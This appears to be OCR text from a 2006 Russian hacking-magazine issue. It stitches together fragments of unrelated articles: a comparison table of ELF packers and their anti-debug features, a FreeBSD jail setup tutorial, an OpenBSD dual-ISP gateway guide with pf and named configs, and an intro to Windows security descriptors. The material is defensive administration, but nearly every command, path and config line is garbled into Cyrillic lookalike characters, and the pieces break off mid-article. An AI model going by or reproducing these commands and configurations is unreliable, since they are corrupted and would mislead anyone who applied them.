$ іпзтосі збіѵаікт.о 

; выгружаем модуль (свою 
работу он уже выполнил) 

$ гттосі збіѵаікт 

; проверяем журнальные 



ХАРАКТЕРИСТИКА 


ЕЬРСРУРТ 


іірх 


1 ВѴРІЧЕѴЕ 1 


5НІѴА 


апіі-беЬид 


нет 


нет 


1 Да | 


да 


апіі-біззетЫег 


есть 


нет 


1 да 1 


да 


апіі-кгасе 


нет 


да 


1 да 1 


да 


аІІоѵИо аііасб 


да 


да 


і да 


нет 


апіі «ргосбитр» 


да 


нет 


нет 


да 


интерфейс 


ІіЬс 


зузсаІІ 


зузсаІІ 


зузсаІІ 


содержит распак 


нет 


да 


1 нет 1 


нет 


взломан 


да 


да 


1 да | 


да 
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ЕВГЕНИЙ ЗОБНИН АКА Л 

/ Л М@Ы$Т.ПІІ / 



ИСПОЛЬЗУЕМ ТЕХНОЛОГИЮ ШІ ДЛЯ ЗАПУСКА 
^^Ла^НЕБЕЗОПАСНОГО СОФТА 



ВЧЕРА СИСТЕМНЫМ АДМИНИСТРАТОРОМ ИВАНОВЫМ БЫЛИ ЗАДЕРЖАНЫ ТРОЕ ПОДОЗРЕВАЕМЫХ В РАЗГЛАШЕНИИ КОН 
ФИДЕНЦИАЛЬНОЙ ИНФОРМАЦИИ. ЗЕШМАІЕ, ѴѴЕІ-ЕТРО И РНР В ДАННЫЙ МОМЕНТ НАХОДЯТСЯ В КАМЕРЕ ПРЕДВАРИТЕЛЬ 
НОГО ЗАКЛЮЧЕНИЯ И СВОЮ ВИНУ НЕ ПРИЗНАЮТ. ГРАЖДАНИН ИВАНОВ ЗА ПРОЯВЛЕННУЮ БДИТЕЛЬНОСТЬ ПОЛУЧИЛ О 

РАБОТОДАТЕЛЯ ДЕНЕЖНОЕ ВОЗНАГРАЖДЕНИЕ. 

НЕТ, Я НЕ ПЕРЕПУТАЛ АДРЕС РЕДАКЦИИ ЖУРНАЛА, НАЧАВ СТАТЬЮ ТАКИМ ІІЧТВО. СЕГОДНЯ МЫ ПОГОВОРИМ О ВЕЩАХ, 
КАЗАЛОСЬ БЫ, НЕСОВМЕСТИМЫХ — ОБ АДМИНИСТРИРОВАНИИ ВЗО-СИСТЕМ И ТЮРЕМНОМ ЗАКЛЮЧЕНИИ (КОНЕЧНО 
ЖЕ, ВИРТУАЛЬНОМ, КАК И ВСЕ В ЦИФРОВОМ МИРЕ). РЕЧЬ ПОЙДЕТ О ТЕХНОЛОГИИ ЛАІЬ, ПРИМЕНЯЕМОЙ В ЕРЕЕВЗО ДЛЯ 
ИЗОЛЯЦИИ ОТДЕЛЬНЫХ НЕБЕЗОПАСНЫХ СЕРВИСОВ ОТ ОСНОВНОЙ ХОСТ-СИСТЕМЫ. 



технологии іаіі есть множество назва- 
ний. Это и прямой перевод — тюрьма, 
и лукавое — песочница, и громкое 
— виртуальный сервер. В любом случае, все 
они подразумевают одно — изолированную 
среду исполнения. Принцип работы іаіі основан 
на способности системного вызова сИгооі(2) 
заключать процесс и всех его потомков в отре- 
занную от основной системы среду исполнения. 
Т ак, например, скопировав всю систему в каталог 
/изг/сИгооі, а затем, выполнив команду «сбгооі 
/изг/сбгооі /Ьіп/зб», мы окажемся в изолирован- 
ной среде, и действия, выполняемые в ней, не от- 



разятся на основной системе. На первый взгляд, 
отличная площадка для запуска небезопасного 
софта, но у сбгооі есть один существенный недо- 
статок — полномочия суперпользователя в нем 
неограниченны. Злоумышленник, завладевший 
правами гооі'а, сможет модифицировать ядро, 
загружать модули, изменять сетевую конфигу- 
рацию, монтировать файловые системы и даже 
легко выбираться из сИгооі-окружения. ЭаіІ же, 
напротив, лишает суперпользователя многих 
привилегий, как бы приравнивая его к особому 
классу пользователей. В частности, находясь в 
]аіІ-окружении, гооі не имеет права: 



1 / Загружать модули ядра и каким-либо образом 
модифицировать ядро (например, через /беѵ/ 
ктет). 

2/ Изменять переменные ядра (за исключением 
кегп.зесигеіеѵеі и кегп.ііозіпате). 

3/ Создавать файлы устройств. 

4/ Монтировать и демонтировать файловые сис- 
темы. 

5/ Изменять сетевые конфигурации. 

6/ Создавать ВАѴѴ-сокеты (поведение настраи- 
вается). 

7/ Получать доступ к сетевым ресурсам, не ассо- 
циированным с ІР-адресом іаіі'а. 
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8/ Работать с Зузіет V ІРС (поведение настраи 
вается). 

Э/ Присоединяться к процессу и использовать 
рігасе(2). 



Как видно, полномочия гооі'а внутри іаіі-окру- 
жения очень ограничены, но такие базовые (и в 
большинстве случаев необходимые) операции, 
как манипулирование правами доступа и лими- 
тами, а также привязка к привилегированным 
портам, суперпользователь выполнять спосо- 
бен. Жесткое обрезание прав администратора 
внутри іаіі гарантирует, что горе-хакер не сможет 
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> Караул! гооі потерял права 




> Чтобы приведенные 
в примере правила 
редиректа пакетов 
заработали, придется 
пересобрать ядро с под- 
держкой АІ_ТО (орііопз 
АІ_ТО). 

Технология іаіі впервые 
появилась в ЕгееВЗР 4.0. 



выбраться из окружения и навредить работоспо- 
собности корневой машины. Кроме того, іаіі вир- 
туализирует сетевые ресурсы машины и требует 
назначения выделенного ІР-адреса для каждого 
ІаіІ-окружения. Именно по этой причине іаіі часто 
называют виртуальным сервером, 
баіі эффективно решает проблемы, связанные 
с проникновением непрошеных гостей в корне- 
вую машину, но совершенно беззащитен против 
тех, кто хочет использовать ресурсы сервера в 
корыстных целях. Суперпользователь вправе 
устанавливать лимиты, поэтому любой, полу- 
чивший гооі'а внутри ІаіІ-окружения, сможет по- 
весить систему при помощи пресловутой Тэгк- 
бомбы. ЗМТР-сервер может быть использован 
для рассылки спама, а РТР-сервер превращен 
в хранилище вареза. Это не большая трагедия 
для администратора, который следит за своим 
сервером, но пустяковой ее тоже не назовешь. 
Частично эти проблемы можно решить, создав 
нечто вроде демилитаризованной зоны (ЭМ2) 
из нескольких іаіі'ов, но это уже тема отдельной 
статьи. 



Сборка ІаіІ-окружения 

# ЦАИ=/изгДаИ/1 92. 1 68.3.3 
#тксІіг-р $ЦАИ 

# таке ѵѵогісі 0ЕЗТ01Н= 
$ЦАІЬ 

#ссІеІс 

# таке сІізІгіЬиДоп 

ОЕ5ТОІРІ=$^ІІ_ 

#с№АІІ_ 

# Іп -зШеѵ/пиІІ кегпеі 



Для остановки іаіі-сер- 
вера из хост-системы 
достаточно убить все 
процессы іаіі'а командой 
«кі II -ТЕРМ». 

В ЕгееВЗР 6.1 у команды 
іаіі появилась опция ЧГ, 
которая позволяет запи- 
сать в файл параметры 
ІаіІ-окружения. 



В результате каталог /изг/іаіІ/1 92. 168.3.3 будет 
содержать все необходимое для создания ново- 
го іаіі'а. Здесь имя каталога было выбрано в соот- 
ветствии с ІР-адресом, который мы вскоре назна- 
чим іаіі'у- На самом деле, имя может быть любым, 
но в случае создания нескольких іаіі'ов ассоци- 
ация имени каталога с ІР-адресом или сервисом 
очень помогает в администрировании. 

Далее назначаем сетевому интерфейсу ІР-псев- 
доним, адрес іаіі'а. ІР-алиасинг выполняется при 
помощи команды /зЬіпДсопіід: 



О Личный іаіі-сервер 

Наверное, немногие из читателей могут похвас- 
таться наличием в своем распоряжении сразу 
нескольких глобально маршрутизируемых 
ІР-адресов. Поэтому іаіі'у придется назначить 
ІР-адрес из сетей класса А, В или С (10.0.0.0/8, 
172.16.0.0/12, 192.168.0.0/16). Пакеты с таки- 
ми адресами назначения никогда не придут из 
внешнего мира, так как еще вначале пути будут 
отсечены корректно настроенным маршрути- 
затором. Также необходимо будет произвести 
трансляцию сетевых адресов (ЫАТ) и настроить 
редирект входящих пакетов с определенными 
портами назначения на зарезервированный ІР- 
адрес из частного диапазона. Пусть это будет, 
например, 192.168.3.3. 

Для создания нового ІаіІ-окружения нам по- 
надобятся исходники ОС. Из них мы соберем 
базовое окружение РгееВЗЭ и установим в вы- 
деленный каталог, получив в результате копию 
хост-системы. Можно пойти и другим путем: 
скопировать все необходимое для запуска 
сервиса прямо из корневого каталога, но это 
трудозатратный и чреватый ошибками способ, 
поэтому его мы пока оставим. Итак, установив 
с диска или получив при помощи сѵзир исход- 
ники, переходим в каталог /изг/згс и набираем 
следующую последовательность команд: 



# ікюпф есІО іпеі аііаз 1 92. 1 68.3.3 255.255.255.255 

Чтобы не утомлять себя набором этой команды 
каждый раз после перезагрузки, поправим /еіс/ 
гс.сопТ 

# есбо и іЬоп1 : ід_есІ0_аІіаз0=\"іпеі 192.168.3.3Ѵ" » /еіс/ 
гс.соп! 

Также необходимо устранить конфликты между 
корневой машиной и іаіі-окружением, изменив 
конфигурацию некоторых сетевых демонов: 

# есГіо "зузіодб ДІадз=\"-зз\"" » /еіс/гс.сопі 

#есбо "іпе1:сІ_1 : Іадз=\"-\л/\/Ѵ -а <ІР-адрес корневой машины>\"" 
»/еІс/гс.соп1 : 

Первая команда укажет демону зузіодб не зани- 
мать порт 514 для приема журнальных записей 
с других хостов. Вторая настроит демон іпеіб на 
прием запросов только с ІР-адреса коневой ма- 
шины. Любой сервис, работающий на корневой 
машине, должен быть настроен соответствую- 
щим образом. 

При создании іаіі'ов также необходимо учитывать 
их специфику, то есть виртуальную сущность 
всего ІаіІ-окружения. Поэтому придется немного 
покопаться в недрах каталога/изг/іаіІ/1 92. 1 68.3.3/ 
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> Наглядный пример запуска іаіі-сервера 




еіс. Теперь переходим в іаіі с правами суперполь- 
зователя (вход без запуска инициализационных 
скриптов): 

# іаіі /изг/іаіІ/1 92. 1 68.3.3 іаіі.і 1 т.огд 1 92. 1 68.3.3 /Ьіп/зГі 

Команда іаіі требует указания четырех аргумен- 
тов: путь, доменное имя, ІР-адрес и команда, ко- 
торая будет выполнена после входа в іаіі-окруже- 
ние. Оказавшись внутри іаіі'а, следует выполнить 
несколько действий: 

1 / Создаем пустой файл ІзіаЬ (іоисН /еісДзІаЬ), 
чтобы скрипты инициализации не ругались на 
его отсутствие. 

2/ Устанавливаем пароль для суперпользова- 
теля (раззѵѵсі гооі) и создаем, если необходимо, 
дополнительных пользователей. 

3/ Перестраиваем базу почтовых псевдонимов 
(пеѵѵаііазез), зепсітаіі требует ее наличия. 

4/ Настраиваем временную зону (ігзеіир). 

5/ Редактируем /еіс/гезоіѵ.сопі таким образом, 
чтобы сервисы, запущенные внутри іаіі'а, могли 
выполнять 0143-резол винг. Можно указать адрес 
хост-системы, если она выступает в роли кэши- 
рующего 0143-сервера. 

6/ Добавляем в /еіс/гс.сопі следующие строки: 

# ѵі /еіс/гс.соп! 

//Сетевое имя іаіі'а 
НозІпате="іаіІ.і 1 т.огд" 

// Отключаем конфигурирование сетевых интерфейсов 

(они виртуальные) 

пеіѵѵогк_іпІеіТасез="" 

//Запускаем необходимые сервисы 
5вГісІ_епаЫе="УЕЗ" 

Теперь можно выйти из іаі 1-окружения, набрав 
команду ехіі. 

О Помещаем провинившихся в іаіі 

Почти все готово для запуска сервиса (в данном 
случае ззіт) в іаіі-окружении. Осталось примон- 
тировать виртуальные файловые системы к 
соответствующим точкам внутри каталога /изг/ 
ІаіІ/1 92. 168.3.3, чтобы программы, требующие 
их наличия, работали без сбоев. Самой востре- 
бованной из таких ѴРЗ является ргосіз, хотя и к 
ней доступ необходим только небольшому числу 
сетевых демонов. При необходимости подключи 
ісіезкіз и беѵіз. Но в отношении последней нужно 
бытьоченьосторожнымдаккакеемонтирование 
может создать серьезную брешь в безопасности 
хост-системы. Нельзя позволять злоумышлен- 
нику манипулировать файлами устройств. Более 
того, при создании іаіі'ов нужно всегда опираться 



на правило «чем проще, тем надежнее» и мето- 
дом исключения отключать все, что только мож- 
но. 

Разобравшись со всеми тонкостями, запускаем 
ззб-сервер: 

# тоипі -і ргосТз ргос /изг/іаіІ/1 92. 1 68.3.3/ргос 

# іаіі /изг/іаіІДір іаіЦІ т.сот 1 92. 1 68.3.3 /Ьіп/зГі /еіс/гс 

В этот раз мы не собирались самолично за- 
ходить в іаі 1-окружение и поэтому указали в 
четвертом аргументе не просто «/Ьіп/зіт», а 
команду, запускающую инициализационные 
скрипты. Как следствие, на экране должны 
появиться диагностические сообщения, уве- 
домляющие о том, что демоны (ззНісІ, зузіодб и 
сгоп) успешно запустились. В этом также мож- 
но убедиться, взглянув на вывод команды «рз 
ах I дгер Ф> (все процессы, запущенные внутри 
Іаіі'а, получают флаг Ч'). 

Теперьу насесть свой собственный неприступ- 
ный ззб-сервер, но он привязан к фиктивному 
ІР-адресу. Чтобы разрешить клиентам подклю- 
чаться к нему через публичный ІР-адрес, необ- 
ходимо настроить ТСР-форвардинг, что легко 
сделать средствами ОрепВЗЭ'шного рр кото- 
рый не так давно был перенесен в РгееВЗЭ: 

# ѵі /еіс/рі.сопі 

ехІ_й="есІ0" 

Гю5І:_ір="наш внешний ІР-адрес" 

ІаіІ_ір="1 92. 168.3.3" 

//Перенаправляем ззГі-трафикна ІР-адрес іаіі'а 
гбг разз оп $ехУЛпе1 ргоіо іср Рот апуіо $Гюз1_ір\ 
рогіззГі->$іаіІ_Гюзі 

//Блокируем все остальные входящие подключения со сто- 
роны внешнего интерфейса 
Ыоскіпоп$ехН1аІІ 

Если теперь попробовать подключиться с уда- 
ленной машины кззб-порту внешнего ІР-адреса, 
то окажется, что все прекрасно работает. ЗЗН- 
пакеты перенаправляются, порты блокируются. 
Это простейший пример настройки брандмауэ- 
ра. В более серьезной конфигурации придется 
фильтровать еще и пакеты, приходящие с интер- 
фейса обратной петли (через него хост-система 
общается с іаіі'ом). 

Теперь добавим всего один штрих к почти цель- 
ной картине — настроим запуск ззб-сервера при 
загрузке: 

# ѵі/еіс/гс.сопі 

ІаіІ_епаЫе="УЕ5" 

//СписокіаіІ-окружений 

ІаіІ_Іізі="ззГі" 
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> Редирект работает на ура 



//Стандартные опции іаіі 
іаіІ_ззГі_гооісІіг=7изг/іаіІ/1 92. 1 68.3.3" 
іаіІ_ззИ_Гіозіпате="іаіІ.І1 т.огд" 
іаіІ_ззГі_ір="1 92. 1 68.3.3" 

// Какие ФС монтировать? 

ІаіІ_ззІп_сІеѵ!з_епаЫе="ІЧО" 

ІаіІ_ззМсІезс^з_епаЫе="ІЧО" 

ІаіІ_ззГі_ргос^з_епаЫе="УЕЗ" 

О Маленькие хитрости 

В предыдущем разделе мы уже затронули воп- 
рос, касающийся ограничения возможностей 
пользователя внутри іаіі-окружения. Теперь 
рассмотрим этот момент более подробно. Из 
правила «чем проще, тем надежнее» можно 
вывести несколько правил. Во-первых, без 
крайней необходимости не монтируй вирту- 
альные файловые системы в каталог іаіі. Впол- 
не вероятно, что рано или поздно в одной из них 
найдут критический баг, и тогда твой сервер 
может быть скомпрометирован. То же касает- 
ся и зиісі-программ — по возможности их сле- 
дует убрать из іаіі-окружения. Во-вторых, пот- 
рать немного своего драгоценного времени и 
очисти іаіі-окружение от всего, что не влияет на 
работоспособность сервера. Первым шагом 
к достижению этой цели станет модификация 
файла /еіс/таке.сопі хост-системы с последу- 
ющей переборкой іаіі-окружения. Затем следу- 
ет самостоятельно удалить все лишнее из іаіі- 
каталога. Да, это утомительное занятие, но оно 
приносит свои плоды: затрудняет жизнь взлом- 
щику и освобождает дисковое пространство. 
Также рекомендуется установить лимиты на 
используемые ресурсы для всех юзеров и на- 
значить файлам каталога /е\с максимально 
строгие права доступа. 

В нашем примере мы рассмотрели установку 
ззН-сервера в іаіі, но что если нам потребуют- 
ся программы из дерева портов? Копирование 

— это расточительство, создание симлинка 
недопустимо (внутри іаіі-окружения он будет 
указывать сам на себя), І4РЗ — это усложне- 
ние, а следовательно, еще одно узкое место в 
безопасности. Существует более простой спо- 
соб предоставления доступа к дереву портов 

— ипіопіз: 

# тоипі-і ипіогЧз/изг/роіІз /изг/іаіІ/1 92. 1 бв.З.З/изг/роіТз 

В РгееВЗЭ существует несколько переменных 
ядра, изменяя которые, можно контролировать 
поведениеядрапоотношениюкіаіІ-окружению.В 
четвертой ветке эти переменные имели префикс 
Іаіі. РІачиная с пятой, он изменился назесигііу.іаіі. 
Ниже приведен список переменных с описанием 
и рекомендациями: з: 
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ПО МНЕНИЮ ПОДАВЛЯЮЩЕГО БОЛЬШИНСТВА ПСИХИАТРОВ, ЗАВИСИМОСТЬ ОТ СЕТИ — ЭТО НЕ ЧТО ИНОЕ, КАК НОВАЯ 
БОЛЕЗНЬ, АНАЛОГИЧНАЯ ПРИСТРАСТИЯМ К НАРКОТИКАМ ИЛИ АЛКОГОЛЮ. ЗДЕСЬ МОЖНО БЫЛО БЫ ПОСПОРИТЬ СО 
СВЕТИЛАМИ НАУКИ, НО ВЕДЬ ЛЮБОЙ, ДАЖЕ КРАТКОВРЕМЕННЫЙ ПЕРЕБОЙ С ДОСТУПОМ В ИНТЕРНЕТ МЫ ВОСПРИНИ- 
МАЕМ КАК ЛИЧНУЮ ТРАГЕДИЮ ВСЕЛЕНСКОГО МАСШТАБА. О ТОМ, КАК ЛИШНИЙ РАЗ НЕ ОКАЗАТЬСЯ В ОФФЛАЙНЕ, МЫ 
СЕГОДНЯ И ПОГОВОРИМ.. ф Н 






ОРГАНИЗАЦИЯ ИЗБЫТОЧНОГО СОЕДИНЕНИЯ С ДВУМЯ ИНТЕРНЕТ-ПРОВАЙДЕРАМИ 




О 2хІ8Р: руководство к действию 

И тобы получить представление о ра- 
боте того или иного поставщика услуг 
интернета, мы можем часами оцени- 
вать результаты мониторинга его надежности за 
разные годы, по крупицам собирать информацию 
из форумов и дотошно пытать своих знакомых. Но 
каковы бы ни были рейтинги, как бы благосклон- 
ны ни были отзывы пользователей — ни один из 
провайдеров не застрахован от (пусть даже крат- 
ковременных) сбоев, которые, по иронии судьбы и 
без легкого пара, происходят имен но в тот момент, 
когда доступ в сеть крайне необходим. 

Так что, полагаю, у каждого из нас рано или поздно 
возникала идея подключения к домашнему/инсти- 
тутскому/офисному серверу сразу двух интернет- 
каналов(основного и резервного) отразныхпровай- 
деров с возможностью автоматического поднятия 
резервного в случае падения основного. 



О Сделай правильный выбор 

Трансляция сетевых адресов, перенаправле- 
ние пакетов между сетевыми интерфейсами, 
фильтрация входящих и исходящих запро- 
сов... Можно еще очень долго перечислять 
функции, которые возложены на систему, 
обеспечивающую взаимодействие домаш- 
ней/корпоративной локальной сети с всемир- 
ной паутиной. Не стоит также забывать, что 
сейчас, как никогда ранее, вопросы защиты 
клиентских компьютеров от несанкциониро- 
ванного доступа встают на передний план, за- 
тмевая собой практически все остальные. 
Именно поэтому при поднятии шлюза важно 
остановить свой выбор на операционной сис- 
теме, обладающей грамотной реализацией 
стека ТСР/ІР и мощным файрволом с гибким 
синтаксисом правил; системе, имеющую в 
своем составе подавляющее большинство 



сетевых служб, запускаемых в измененном 
корневом каталоге от имени непривилегиро- 
ванного пользователя (так называемые сбгооі: 
окружения), что позволяет максимально сни- 
зить возможный ущерб при взломе. 
Последняя версия непотопляемой ОрепВЗЭ 
(3.9 на момент написания статьи) как нельзя 
лучше подойдет для решения нашей задачи. 
Хотя в качестве используемой операционной 
системы может выступать любая из Ргее/Ыеі/ 
ЭгадопРІуВЗО. 

Также нам понадобится компьютер с тремя 
сетевыми картами (я проводил тестирование 
на Репііит 100/64 МЬ/1,2 ОЬ/3 сетевухи ІпіеІ 
ЕібегЕхргезз РРО 100+), который будет отде- 
лять локальную сеть с внутренней адресаци- 
ей (диапазоны 192.168.0.0/16, 172.16.0.0/12, 
10.0.0.0/8 согласно РРС1918) от двух «вне- 
шних» интернет-каналов. 



/ по 



ХАКЕР 08 /92/ 06 





•л 



> Топология сети 1 

Е Закладываем фундамент для 
нашей конструкции 

В ОрепВЗО сетевые интерфейсы конфи- 
гурируются путем занесения в файл /еіс/ 
ііозіпате.<имя_интерфейса> информации 
вида: «семейство_адресов ІР-адрес мас- 
ка_подсети широковещательный_адрес» 
(ЫОЫЕ означает автоматическое вычисле- 
ние броадкаста на основе маски подсети). 
Имя интерфейса представляет собой назва- 
ние драйвера сетевой карты плюс порядко- 
вый номер. Указываем первый (основной) 
внешний адрес: 

# ѵі /еіс/іюзіпате.іхрО 

іпеі 21 2.34.ХХ. 1 62 255.255.255.248 ЫОЫЕ 

Второй (резервный) внешний адрес: 



# ѵі /еіс/іюзіпате.іхрі 

іпеі 81. 13.ХѴ. 98 255.255.255.224 І\ІОІ\ІЕ 

Внутренний адрес: 

# ѵі /еіс/іюзіпате.іхр2 

іпеі 1 92. 1 68. 1 . 1 255.255.255.0 І\ІОІ\ІЕ 

Информация о шлюзе основного провайдера 
(бѳіаиіі: даіеѵѵау) заносится в файл /еіс/птудаіе: 



#ѵі/еіс/тудаіе 

212.34.ХХ.161 




> Вкладыш к СО ОрепВЗО 3.9 



Далее, с помощью утилиты 5узсіІ(8), уста- 
навливаем значение переменной пеі.іпѳі. 
ірТогѵѵагсІіпд равным единице. Так мы включим 
перенаправление ІРѵ4-пакетов между сетевы- 
ми интерфейсами. 

#зузсіІ-ѵѵпеі.іпеі.ір.іогѵѵагсІіпд=1 

Для того чтобы необходимые значения пе- 
ременных механизма зузсіі вступали в силу 
после перезагрузки системы, следует внести 
соответствующие изменения в файл зузсіі. 
сопі(5): 

# ѵі/еіс/зузсіі.сопі 

//включаем маршрутизацию: 
пеі.іпеі.ір.іогѵѵагсІіпд=1 




тіиіФіі 

> Топология сети 2 



// при панике ядра не сваливаемся в отладчик РОВ: 
сІсІЬ.рапіс=0 

Собственно, на этом вся предварительная на- 
стройка закончена, перезагружаемся: 

#зііиісІо\л/п-г поѵѵ 

О Разруливаем трафик 
на несколько каналов 

Штатный файрвол рі(4) не только возьмет на 
себя функцию преобразования сетевых адре- 
сов и обеспечит эффективную фильтрацию 
пакетов, но и поможет нам настроить сим- 
метричную маршрутизацию для правильного 
возврата пакетов в тот канал, с которого было 
инициировано соединение, вне зависимости 
от настройки беіаиіі: гоиіе. 

# ѵі /еіс/рі.сопі 

//Указываем используемые сетевые интерфейсы: 
ехі_іі_а = "іхрО" 
ехі_іі_Ь = "іхрі " 

//Для каждого из каналов задаем ІР-адрес шлюза: 
ехі_дѵѵ_а = "21 1.34.ХХ.161" 
ехі_дѵѵ_Ь = "81.1 3.ХѴ.97" 

// В таблицу изегз заносим абсолютный путь до конфига с 
ІР-адресами наших клиентов: 
іаЫе <изегз> регзізііііе "/еіс/паі.сопі" 

// Производим трансляцию внутренних адресов в основные 
адреса (не ІР-аііаз'ы) внешних интерфейсов. При отсутс- 
твии ІР-псевдонимов, а также если используется статичес- 
кое назначение ІР-адресов, запись «($ехі_іі_а:0)» можно 
сократить до «$ехі_іі_а». 

паі оп $ехі_іі_а іпеі ігот <изегз> Іо апу -> ($ехі_іі_а:0) 
паі оп $ехі_іі_Ь іпеі ігот <изегз> іо апу -> ($ехі_іі_Ь:0) 

//Важный момент: направляем исходящие пакеты в канал, 
соответствующий адресу источника: 
разз оиі гоиіе-іо ($ехі_іі_а $ехі_дѵѵ_а) іпеіігот ($ехі_іі_а)\ 
іо !(зеіі:пеіѵѵогк) кеерзіаіе 

разз оиі гоиіе-іо ($ехі_іі_Ь $ехі_дѵѵ_Ь) іпеіігот ($ехі_іі_Ь) іо\ 
!(зеіі:пеіѵѵогк) кеер зіаіе 

//Разрешаем входящие подключения кТСР-сервисам: 
разз іп оп $ехі_іі_а геріу-іо ($ехі_іі_а $ехі_дѵѵ_а) іпеі ргоіо іср\ 
іо рогі { ззіі, зтір, хллллл/, іііірз } ііадз 3/ВА кеер зіаіе 
разз іп оп $ехі_іі_а іпеі ргоіо іср ігот ($ехі_іі_а:пеіѵѵогк)\ 
іо рогі { ззіі, зтір, хллллл/, іііірз } ііадз З/ЗА кеер зіаіе 
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>При использовании 
в конфигурационном 
файле рі.сопі(5) 
ключевого слова 
«зеіі» будет происхо- 
дить автоматическая 
подстановка всех ІР- 
адресов, закрепленных 
за нашими сетевыми 
интерфейсами. 







> С помощью макроса « : 
пеіѵѵогк» можно опреде- 
лить СЮП-нотацию сети 
на основе проверки 
ІРѵ4-адреса. Напри- 
мер, в нашем случае 
конструкция «$іпі_іі: 
пеіѵѵогк» будет означать 
192.168.1.0/24. 




> Просматриваем информацию о правилах 
файрвола 

Для второго внешнего сетевого интерфейса 
нужно проделать то же самое (полный пример 
конфигурационного файла рі.сопі ты сможешь 
найти на прилагаемом к журналу диске). Далее в файле 
/еіс/паі.сопі указываем ІР-адреса клиентских машин, кото- 
рым нужно предоставить выход в сеть: 

# ѵі/еіс/паі.сопі 

192.168.1.2/32 

192.168.1.4/32 

192.168.1.7/32 

Проверяем конфиги на наличие ошибок: 

# рісіі -п -і/еіс/рі.сопі 

И активируем набор рулесетов файрвола: 

# рісіі -е -і/еіс/рі.сопі 

О Поднимаем надежный ретранслятор 

Возложив ответственность заразрешениедоменныхимен 
на провайдерские ОЫЗ-серверы, мы, во-первых, обеспе- 
чим избыточность ОЫЗ, и, во-вторых, сведем объем вне- 
шнего ОЫЗ-трафика к минимуму: 

# ѵі /ѵаг/патесі/еіс/патесі.сопі 

асі сііепіз { 127.0.0.1; //Определяем списки управления доступом 



192.168.1/24; 



орііопз { //Задаем глобальные параметры конфигурации сервера имен 



ѵегзіоп "Зіау оІТ ту ОМЗ-зегѵег"; 



Іізіеп-оп { апу; }; 



Іізіеп-оп-ѵ6{попе;}; 



аі Іоѵѵ-Ігапзі'ег { попе; }; 



аііоѵѵ-диегу { сііепіз; }; 



аііоѵѵ-гесигзіоп { сііепіз; }; 



//Доступные ОИЗ-серверы основного и резервного провайдеров 



іогѵѵагбегз { 21 2.34.ХХ. 1 ; 21 2.34.ХХ.39; 81 .13.ХѴ.97;}; 



іогѵѵагб Тігзі; 



Чтобы внесенные изменения вступили в силу, необходимо 
дать указание демону патеб(8) перечитать свой конфиг: 

#тсІсгеІоасІ 

О Постконфигурационные нотф 

Осталось только написать сценарий командного интер- 
претатора, который будет периодически опрашивать зФ 
данные узлы (/зЬіп/ріпд -с 2 -ѵѵ 2 -I сосновной ІР-адрес> 
<ІР-адрес проверяемого хоста>) и при необходимости 
изменять дефолтный маршрут (/зЬіп/гоиіе сііапде беіаиіі: 
<резервный шлюз>). Простейший пример подобнаго 
скрипта можно найти на прилагаемом к журналу диске. □С 




> Пример конфигурационного 
< файла /еіс/рТ.соггі 



РАСПРЕДЕЛЕНИЕ СЕТЕВОЙ НАГРУЗКИ 



Достичь максимальной пропускной способности можно 
двумя способами: настроить трафик-шейпинг (смотри 
статью «Нарезаем трафик ломтиками» в мартовском «Ха- 
кере» за 2006 год) или объединить два доступных канала в 
один виртуальный, как показано ниже: 



ш/ Балансировка исходящего ТСР-трафика:І 



+ • 



[разз іп оп $іпі_іі гоиіе-іо\| 

{ ($ехі_іі_а $ехі_дѵѵ_а), ($ехі_іі_Ь $ехі_дѵѵ_Ь) } гоипсІ-гоЬіп\| 



і пеі ргоіо іср Рот <изегз> іо апу ііадз З/ЗА кеер зіаіеі 



и/ Балансировка исходящего БЮР- и ІСМР-трафика:І 



■разз іп оп $іпі_іі гоиіе-іо\| 



{ ($ехі_іі_а $ехі_дѵѵ_а), ($ехі_іі_Ь $ехі_дѵѵ_Ь) } гоипб-гоЬіп\І 



іпеі ргоіо { ибр, істр } Рот <изегз> іо апу кеер зіаіеі 



Умный форв-эрдинг 

При такой схеме работы также возможно перенаправле- 
ние запросов во внутреннюю сеть. Приведу пример с сер- 
вером терминалов. 



|// Переадресовываем входящие РЮР-соединения на ІР-адрес| 

|1 92. 1 68. 1 .254 и порт 3389^| 

І гбг оп $ехі_іі_а іпеі ргоіо іср іо рогі 3389 іад ЕХТ_ІР_А -> 1 92. 1 68. 1 .254І 
Ігбг оп $ехі_іі_Ь іпеі ргоіо іср іо рогі 3389 іад ЕХТ_ІР_В -> 1 92. 1 68. 1 .254І 



//Устанавливаем маршрут для ответа на входящие пакеты для переад-| 
ресованных РРР-запросові| 

разз іп геріу-іо ($ехі_іі_а $ехі_дѵѵ_а) іпеі ргоіо іср ііадз 5/5А\| 
іаддеб ЕХТ_ІР_А кеер зіаіе| 

разз іп геріу-іо ($ехі_іі_Ь $ехі_дѵѵ_Ь) іпеі ргоіо іср ііадз 5/5А\| 



іаддеб ЕХТ_ІР_В кеер зіаіе| 



Т онкости трансляции сетевых адресов 

1 За счет системы ЫАТ пограничный шлюз может выполнять 
следующие задачи: 

• перехват клиентских запросов из доверенной подсети; 

• подмена исходного порта и адреса источника своим не- 
привилегированным портом и адресом своего внешнего 
сетевого интерфейса; 

• ведение специальной таблицы соответствия установ- 
ленных соединений, чтобы, получив от удаленного хоста 
ответный пакет, корректно перенаправить его клиенту, 
инициировавшему запрос. 




• • 
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ОЧЕНЬ ЧАСТО, ПРОГРАММНО СОЗДАВАЯ ОБЪЕКТЫ, МЫ НЕ ЗАДУМЫВАЕМСЯ О БЕЗОПАСНОСТИ, ОСТАВЛЯЯ ЕЕ ПАРАМЕТРЫ НАУСМОТЯІ 
НИЕ ОС. НО ВЕДЬ УПРАВЛЕНИЕ ПРАВАМИ ДОСТУПА НЕ ТАКАЯ УЖ И СЛОЖНАЯ ОПЕРАЦИЯ, К ТОМУ ЖЕ ТРЕБУЕТ ВСЕГО НЕСКОЛЬКИХ ЛИШ- 
НИХ СТРОЧЕК КОДА И ПОНИМАНИЯ РАБОТЫ СООТВЕТСТВУЮЩИХ ФУНКЦИЙ. ЗНАНИЕ ФУНКЦИЙ УПРАВЛЕНИЯ ДОСТУПОМ МОЖЕТ ПРИ- . 
ГОДИТЬСЯ НЕ ТОЛЬКО ПРИ СОЗДАНИИ ОБЪЕКТОВ, ПОЭТОМУ СЕГОДНЯ МЫ РЕШИЛИ РАССКАЗАТЬ ТЕБЕ ПРО ЗЮ, ЗЕСІІНІТѴ АТТВІВІІТЕЗ, " 
ЗЕСЫРІТУ ОЕЗСРІРТОР И ОБО ВСЕМ, ЧТО СВЯЗАНО С ЭТИМИ ПОНЯТИЯМИ. 



